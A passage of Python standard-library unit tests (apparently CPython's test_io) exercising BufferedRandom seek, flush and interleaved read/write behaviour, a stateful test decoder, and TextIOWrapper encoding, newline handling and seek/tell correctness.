self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream; otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs to
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point in testing it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@skip_if_sanitizer(memory=True, address=True, reason="sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
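# The state is (pending input bytes, flags) where flags packs i and o as i*100 + o, each XORed with 1 so that a freshly reset decoder reports flags == 0.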
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default; tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
